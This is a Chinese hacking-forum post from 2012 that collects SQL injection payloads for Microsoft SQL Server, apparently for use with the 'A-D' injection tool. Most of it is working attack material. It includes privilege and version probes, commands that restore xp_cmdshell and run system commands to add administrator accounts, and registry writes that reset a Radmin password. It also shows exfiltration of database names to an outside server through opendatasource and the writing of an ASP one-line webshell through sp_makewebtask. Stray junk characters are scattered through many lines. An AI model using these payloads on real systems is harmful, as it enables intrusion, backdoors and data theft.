找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1985|回复: 0
打印 上一主题 下一主题

阿D常用的一些注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:26:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
阿D常用的一些注入命令9 a) W# @' B7 m' j' P* w2 N8 @
//看看是什么权限的' |; _4 j7 _+ [# f% A
and 1=(Select IS_MEMBER('db_owner'))
9 |- N6 Q$ E1 Z* }4 hAnd char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
6 A3 @( g- `! R8 K8 r& D. ]- E) \: i$ p, I
//检测是否有读取某数据库的权限1 q1 Z# A, @; y) d' H0 R
and 1= (Select HAS_DBACCESS('master'))  o% g9 B, h3 V! ~' }
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
% t$ n0 y  w( I3 b) |5 h0 q* ?3 R

3 @: G0 F+ v% B8 n8 P数字类型* y: o+ M+ Q) }7 I1 r& v
and char(124)%2Buser%2Bchar(124)=0
# u5 A8 j7 E2 H3 p) A8 c- i( M
9 q! Q/ ?) S- v字符类型2 P- x4 T5 E3 d* Q" [' B
' and char(124)%2Buser%2Bchar(124)=0 and ''='$ Z: o$ }' z' g4 |+ {4 D- K
& A- K, Q5 b4 U; k
搜索类型
% J- U! G9 y  S9 g+ B' and char(124)%2Buser%2Bchar(124)=0 and '%'='2 S  ^9 c4 e* z& ~
" J" R9 ?8 i/ C9 N' Y
爆用户名) J/ s: N, r) n4 S4 n3 j
and user>0
: t" Q- q) f9 ~1 G/ |1 _' and user>0 and ''='8 R" s& `( e) @7 Z
" Q7 i7 c! T) ~6 `" u
检测是否为SA权限" b( W4 ^: @% \; P/ ^$ ?
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
, @9 e: P! @# R; q4 x5 lAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --: F* `5 {$ A4 D( D( ]
. i  ~; n$ V/ |6 J
检测是不是MSSQL数据库5 |, X# `# b; k% t
and exists (select * from sysobjects);--
- q+ m6 k) Z2 R' T1 y" Y& P# L; r( R0 W+ U8 ^5 J% ?1 p
检测是否支持多行
9 N+ a% G9 @7 c;declare @d int;-- : f$ g$ b: V6 |8 ]" W
; |5 I2 z3 s7 z% F
恢复 xp_cmdshell6 `& X+ b4 _2 w+ D
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
$ n2 D5 V$ ^; ^7 l  m+ O
+ y5 d1 [. E" r$ [' p8 Z4 E+ \" _4 C' U5 z! s
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version') . w9 a3 G9 I& j

: s6 ]4 ?) D/ Q2 _( j//-----------------------
7 J# I" E7 g6 F) g0 t//      执行命令
+ `5 ^- e+ d/ y//-----------------------) Z9 P' t$ ^( T# O; D* R/ A
首先开启沙盘模式:
3 N- Q( Q" z  t' q' R. Cexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1, Z* h6 f/ `- @, j8 `

) s) R5 C8 C( }* @1 p3 n# Q0 J: @# k( R然后利用jet.oledb执行系统命令
- t" D% X( w- J3 \select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')8 ?  m8 l* ~& c* d8 k! F7 X! y7 E

7 ?2 r/ z: W+ H9 m: J6 a/ D+ t执行命令  a* P3 `2 Q0 Y3 ^
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
8 P; s$ v1 X% U  ^/ V
# c, D8 s  i0 y7 v8 b# OEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'& R, V( B% h6 Y7 T7 u
! Z9 J  R. p: r
判断xp_cmdshell扩展存储过程是否存在:; N) k/ W( Q; a
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
% f1 l$ x, K% }
2 U3 W/ K  U" b9 J写注册表/ P& x5 ~; o3 I% a
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1+ y/ n( P: ]& e

6 V7 {% K* _9 d: m2 AREG_SZ# C# a$ v. v& a) |+ ^

: {. a: P" d$ _2 S( `读注册表" R5 F! e/ f1 V# n
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'$ h% U- G  m- w( O) P8 L. \

# c8 y% c" I6 y  u6 g( A! ~. T读取目录内容
5 s( q& q8 H6 q  e0 Texec master..xp_dirtree 'c:\winnt\system32\',1,15 V8 v7 b$ v" ~: r

. m) _' [( P: _! l0 R3 [6 u5 C9 U6 b0 ?/ F
数据库备份# _, l4 J9 M" z7 r2 [6 W
backup database pubs to disk = 'c:\123.bak'
  r$ l0 i! {" O( G$ I; s  N2 Q- D
1 u: h1 v. [5 j# ^//爆出长度$ q8 v7 D$ j! _* M1 G
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--4 v5 s1 F# I: X1 w+ L( h5 m
  H: h& H  B* `2 t0 D

) K8 Y) P. ~5 m0 O$ C
! C/ y, z' I: \$ _更改sa口令方法:用sql综合利用工具连接后,执行命令:! V( o& }- L5 ^' b: h# `
exec sp_password NULL,'新密码','sa'
! @& A" x) {$ S, ^4 ?, L' L. K7 ^# G) Y
添加和删除一个SA权限的用户test:
" Q' O1 R; W0 w6 ]1 W, L  mexec master.dbo.sp_addlogin test,ptlove; L  M5 ]$ J9 b7 t; P3 D0 g
exec master.dbo.sp_addsrvrolemember test,sysadmin
& b, M; A  e! W9 e/ v. t& g8 i2 K" @+ |  g; [
删除扩展存储过过程xp_cmdshell的语句: ( v5 R7 I2 o  d
exec sp_dropextendedproc 'xp_cmdshell'
' @  |3 A- W6 R" M0 z% O" w4 V5 z# Z  g1 [
添加扩展存储过过程, q2 J+ U3 o) I5 F( o6 R: {
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
! ?9 b$ K; u0 ~& P  jGRANT exec On xp_proxiedadata TO public $ x9 x. B+ h, x) y( o( p8 s

: C/ x$ |4 U" h( \' Q7 o6 M! w% h( n1 z- W  [
停掉或激活某个服务。 $ r, Q: p6 F$ K& \
& V' R9 ?8 u& n$ A
exec master..xp_servicecontrol 'stop','schedule'
! v& w) J1 B6 S  ~; Yexec master..xp_servicecontrol 'start','schedule'6 [& e; G& k# y& A

. q6 ?+ J% c. ]5 ?: E" ydbo.xp_subdirs
. b  `$ G0 n/ f3 i  N8 C
7 a% G" C% \( w  j0 Y7 `只列某个目录下的子目录。: h2 F! ^( f2 ]2 }+ W  |
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'. I6 }( {  A% T
; m9 k2 F3 Y  v8 ?: s
dbo.xp_makecab, x! d" I0 p- K  b

! _# U0 I+ [1 r9 Y将目标多个档案压缩到某个目标档案之内。
) a& U9 @: K' y) Y所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。' P* y9 n3 S3 R9 M4 G$ e* K

4 {( K( G* C7 O/ b7 x) rdbo.xp_makecab& X" G5 @3 V; L- u: d- E* E
'c:\test.cab','mszip',1,
. J% \3 d# E8 }; d! ^0 ['C:\Inetpub\wwwroot\SQLInject\login.asp',
4 Q  y# D# E. Z1 X: @'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
& g. h4 H& w% n$ b- W) s! }
& ]" C2 m$ l7 L+ a( i4 axp_terminate_process2 h+ C5 L9 h9 {: Z$ m4 ^% }8 {2 s
9 X; v7 i" u" a6 q, T; g
停掉某个执行中的程序,但赋予的参数是 Process ID。
" Q- D3 C% ]* [; I# w# Q利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
$ w2 C. ~. Y! t6 x8 Z3 R5 c& y0 \8 E& b* h! t$ u2 i
xp_terminate_process 2484
, p/ S% d7 n& k: N' w7 [1 J+ f) Y1 J( f
xp_unpackcab% t$ B, [7 y" m2 v  d
( F) n- q1 G  X- Z* r; ~, P1 N
解开压缩档。- l- r" [7 o. n, B, Y5 V

, c3 r+ k4 M" j# q; y0 jxp_unpackcab 'c:\test.cab','c:\temp',1
; U! b8 X: E5 h! P) z6 T% X; E  b: r/ b! i+ E4 W( X0 Z7 [

8 K- u' `. X% i某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
& @3 ]: \( v( }4 K  b0 y6 {  [! [& g0 O4 `
create database lcx;
) o5 Z5 D9 G# p8 d" ]$ I/ iCreate TABLE ku(name nvarchar(256) null);
) {' w2 |& j: Z6 ~* V5 kCreate TABLE biao(id int NULL,name nvarchar(256) null);" ^" D1 x( O2 b# U
0 b4 A! i0 @1 I' D3 Q
//得到数据库名% H1 J- _8 U% j9 m
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases: D0 e5 @) K: l6 o& Y2 H

+ e. W; ], A, J- c
( m) ^1 [/ v' ]# n, `( ~//在Master中创建表,看看权限怎样* m% x+ d+ `) ~8 [& G
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
. ?4 Q% I  U6 V
) l/ B* |9 s' a) y用 sp_makewebtask直接在web目录里写入一句话马:
9 f7 j, r2 d, |; f! I7 lhttp://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
4 T9 m% A9 s0 i  [6 Z/ F' Y* D& i
& C. r7 B3 I# m' G//更新表内容' T: e8 L9 ^2 i5 r
Update films SET kind = 'Dramatic' Where id = 123
3 B6 y4 ]( w( t, w
6 [$ N" X( z4 V; c" w//删除内容1 t! M' K1 l0 [' @2 t- C/ t4 O. a
delete from table_name where Stockid = 3
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表